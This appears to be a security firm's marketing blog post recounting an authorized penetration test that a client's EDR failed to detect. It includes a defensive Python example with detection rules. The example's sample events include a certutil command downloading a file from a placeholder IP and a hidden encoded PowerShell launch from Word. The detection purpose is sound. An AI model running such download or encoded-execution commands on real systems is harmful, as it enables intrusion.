Most businesses trust their cybersecurity software to alert them when something goes wrong. They pay for it every month, they see the dashboard light up green, and they assume they're covered. We just proved that trust might be misplaced.

A company hired us to run a real penetration test against their network. Not a simulation. Not a checkbox exercise. An actual attack using the same tools and techniques that real threat actors use every day. What happened next told us everything we needed to know about the state of cybersecurity tooling in 2026.

Concerned about whether your security tools are actually working? Learn how SkyNet MTS builds layered cybersecurity programs that don't rely on a single vendor's promises. Explore our cybersecurity services.

Watch: We Ran a Real Attack. Our SOC Caught It. The EDR Didn't.

What Happened

We used the same penetration testing tools and techniques used by both professional security teams and real-world attackers to launch an attack against a workstation on their network. This was a fully authorized engagement. The company hired us to do exactly this. Everything was above board.

The attack targeted a known vulnerability. We gained access to the machine, established a persistent connection, and began performing the kinds of actions an attacker would take once inside a network: enumerating the system, escalating privileges, and moving through the environment.

Here's where it gets interesting.

As part of our process, we deploy monitoring software on the target workstation to capture everything that happens during the attack -- every connection, every process, every privilege escalation attempt. This is how we build the report that shows the company exactly where their weaknesses are so they can address them. That monitoring picked up the attack within seconds. Every stage was visible in real time.

The company's endpoint detection and response product -- a widely used, industry-leading EDR platform, the kind deployed across thousands of MSPs and internal IT departments -- reported absolutely nothing.

Not after one minute. Not after one hour. Seven hours later, still nothing.

No alert. No flag. No detection of any kind. The green dashboard stayed green while an active attack was happening on the machine it was supposed to be protecting.

Why This Matters More Than You Think

This wasn't some exotic zero-day exploit that nobody has ever seen before. The tools and techniques we used are publicly available and well-documented. If your security tooling can't detect an attack using common, widely known methods, what exactly is it protecting you from?

Here's the uncomfortable truth: most businesses have no idea whether their cybersecurity tools actually work. They buy software on a vendor's recommendation, see a dashboard full of green checkmarks, and assume the job is done. Nobody tests it. Nobody verifies it. Nobody asks the obvious question: "Would this catch a real attacker?"

And when a real attacker shows up -- not with a test, but with ransomware or data exfiltration -- that's when businesses find out the answer. By then it's too late.

Vulnerability Assessment vs. Penetration Testing: Know the Difference

Part of the problem is that most businesses don't understand what they're actually buying when it comes to security testing. Two terms get thrown around interchangeably, but they are very different things.

A vulnerability assessment is a scan. Software looks at your systems and produces a list of known weaknesses -- outdated software, missing patches, misconfigured settings. It tells you what could be a problem. Think of it as a home inspector walking through your house and noting that the back door lock is loose.

A penetration test is an actual attack. A security professional tries to break into your systems using the same tools, techniques, and creativity that a real attacker would use. It doesn't just find the loose lock -- it picks it, walks inside, and shows you exactly what an intruder could access. It tells you what is a problem, right now, in practice.

Most businesses that think they've had a "pentest" have actually had a vulnerability scan. And most businesses that rely on a single EDR product have never tested whether it would actually catch someone breaking in. That gap between assumption and reality is where breaches happen.

Why EDR Products Miss Active Attacks

EDR tools aren't useless. They do catch things. But their detections still lean heavily on what the vendor already knows: known malware families, known file hashes, known command-line strings and known sequences of bad behavior. If an attacker's activity doesn't match a signature or a behavioral rule the vendor has shipped, the agent has nothing to alert on, no matter how much telemetry it is collecting.

Modern attackers know this. They use fileless malware, living-off-the-land techniques (abusing legitimate, signed system tools such as built-in download and scripting utilities for malicious purposes), and custom payloads that don't match any known hash. The tradecraft has changed. The tooling, in many cases, hasn't kept up.
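To make the difference concrete, here is a small added example (written for this article, not code from the engagement, from SkyNet MTS, or from any EDR vendor) that runs a hash-only "signature" check and a handful of behavioral rules over constructed process-creation records. The record fields, the hashes, the IP address, and the rule set are all assumptions made for illustration; the point is that the living-off-the-land events carry the hash of a legitimate OS binary, so a hash list stays quiet on exactly the events that behavioral rules flag.

```python
import hashlib
import ntpath
import re

# Everything below is constructed for this example. Records are shaped loosely
# like Sysmon process-creation events; field names are an assumption.

# A "known bad" hash set stands in for a signature database. The hash is of a
# constructed string, not of any real malware sample.
KNOWN_BAD_SHA256 = {hashlib.sha256(b"constructed-known-bad-sample").hexdigest()}

# Hash standing in for a legitimate, signed OS binary (also constructed).
OS_BINARY_SHA256 = hashlib.sha256(b"constructed-signed-os-binary").hexdigest()

SAMPLE_EVENTS = [
    {   # 1. living-off-the-land download: signed certutil.exe, no bad hash
        "id": 1,
        "image": r"C:\Windows\System32\certutil.exe",
        "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.10/stage.txt C:\Users\Public\stage.txt",
        "parent": r"C:\Windows\System32\cmd.exe",
        "sha256": OS_BINARY_SHA256,
    },
    {   # 2. Office document spawning hidden, encoded PowerShell (payload truncated)
        "id": 2,
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA",
        "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "sha256": OS_BINARY_SHA256,
    },
    {   # 3. dropped binary whose hash IS on the known-bad list
        "id": 3,
        "image": r"C:\Users\alice\Downloads\update.exe",
        "cmdline": "update.exe",
        "parent": r"C:\Windows\explorer.exe",
        "sha256": next(iter(KNOWN_BAD_SHA256)),
    },
    {   # 4. benign use of the same certutil binary as event 1
        "id": 4,
        "image": r"C:\Windows\System32\certutil.exe",
        "cmdline": r"certutil.exe -verify C:\certs\server.cer",
        "parent": r"C:\Windows\explorer.exe",
        "sha256": OS_BINARY_SHA256,
    },
    {   # 5. benign scheduled PowerShell script
        "id": 5,
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell.exe -File C:\scripts\backup.ps1",
        "parent": r"C:\Windows\explorer.exe",
        "sha256": OS_BINARY_SHA256,
    },
]


def _basename(path: str) -> str:
    return ntpath.basename(path).lower()


def signature_match(event: dict) -> bool:
    """Hash-only check: is the executable on the known-bad list?"""
    return event["sha256"] in KNOWN_BAD_SHA256


_OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
_INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                 "cscript.exe", "mshta.exe", "rundll32.exe"}


def rule_certutil_download(e: dict) -> bool:
    """certutil used as a downloader (-urlcache with a URL on the command line)."""
    return bool(re.search(r"(?i)\bcertutil(\.exe)?\b.*\s-urlcache\b.*https?://", e["cmdline"]))


def rule_encoded_powershell(e: dict) -> bool:
    """PowerShell launched with an encoded command (-e/-ec/-enc/-EncodedCommand)."""
    return bool(re.search(r"(?i)\bpowershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\b", e["cmdline"]))


def rule_office_spawned_interpreter(e: dict) -> bool:
    """An Office application is the parent of a shell or script interpreter."""
    return _basename(e["parent"]) in _OFFICE and _basename(e["image"]) in _INTERPRETERS


BEHAVIOR_RULES = [
    ("certutil_download", rule_certutil_download),
    ("encoded_powershell", rule_encoded_powershell),
    ("office_spawned_interpreter", rule_office_spawned_interpreter),
]


def behavior_matches(event: dict) -> list:
    """Names of the behavioral rules that fire on one event, in rule order."""
    return [name for name, rule in BEHAVIOR_RULES if rule(event)]


def triage(events: list) -> dict:
    """Map event id -> (signature hit?, [behavioral rule names])."""
    return {e["id"]: (signature_match(e), behavior_matches(e)) for e in events}


def missed_by_signatures(events: list) -> list:
    """Event ids a hash-only engine is silent on while a behavioral rule fires."""
    return [e["id"] for e in events if not signature_match(e) and behavior_matches(e)]


if __name__ == "__main__":
    for eid, (sig, beh) in triage(SAMPLE_EVENTS).items():
        print(f"event {eid}: signature={'HIT' if sig else 'quiet'} behavior={beh or 'quiet'}")
    print("missed by hash list alone:", missed_by_signatures(SAMPLE_EVENTS))
```

Events 1 and 2 are the ones a hash list never sees, because the binaries involved are the operating system's own; only the parent/child relationship and the command-line arguments give them away. Event 4 exercises the same certutil.exe binary for a legitimate purpose and fires nothing, which is the false-positive discipline a rule like this needs before it is worth shipping.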

There's also a business model problem. Many EDR vendors sell to thousands of MSPs and IT teams who deploy the product and move on. The vendor has a strong incentive to minimize false positives so the product doesn't generate too many alerts, because alert fatigue leads to customer churn. The unintended consequence: the default tuning is quiet. Quiet is good for customer satisfaction. Quiet is terrible for catching real attacks.

This is exactly why layered security matters. No single product should be the only thing standing between your business and a breach. You need independent monitoring -- a second set of eyes that doesn't rely on the same detection engine, the same signature database, or the same vendor's priorities.

What You Should Do About It

If you're reading this and wondering whether your own security tools would pass the same test, here's what we'd recommend:

1. Test your tools with a real penetration test

Not a vulnerability scan. Not a compliance checkbox. An actual, authorized attack against your environment, conducted by professionals who know how to simulate real-world threat actors. If your tools can't detect it, you need to know that before an attacker shows you the hard way.

2. Don't rely on a single product

Layered security isn't a buzzword. It's a design principle. Your EDR should be one layer. Independent SIEM monitoring should be another. AI-driven behavioral analysis adds a third. Each layer catches what the others miss. That's how real security works.

3. Ask your IT provider hard questions

When was the last time they tested your defenses? Not scanned -- tested. Can they show you evidence that your tools detected a simulated attack? If the answer is "we haven't done that," you have a gap that needs closing.

4. Stop trusting dashboards

A green dashboard means the software is running. It does not mean you are secure. Those are two very different statements, and treating them as the same thing is one of the most common and most expensive mistakes businesses make.

5. Demand independent verification

Your security provider should be able to prove their tools work. Not with a marketing brochure or a case study from someone else's environment. With real test results from your network, your machines, your attack surface. If they can't do that, ask yourself what you're paying for.

The Bottom Line

The monitoring software we deployed during the test caught the attack in seconds. The company's EDR product -- widely deployed, industry-leading -- missed it entirely for over seven hours. That's not a minor gap. That's a fundamental failure of the product to do the one thing it was designed to do.

Your business deserves better than blind trust in a vendor's green dashboard. Test your tools. Verify your defenses. And if your current setup can't catch a real attack, it's time to start asking harder questions about what you're paying for.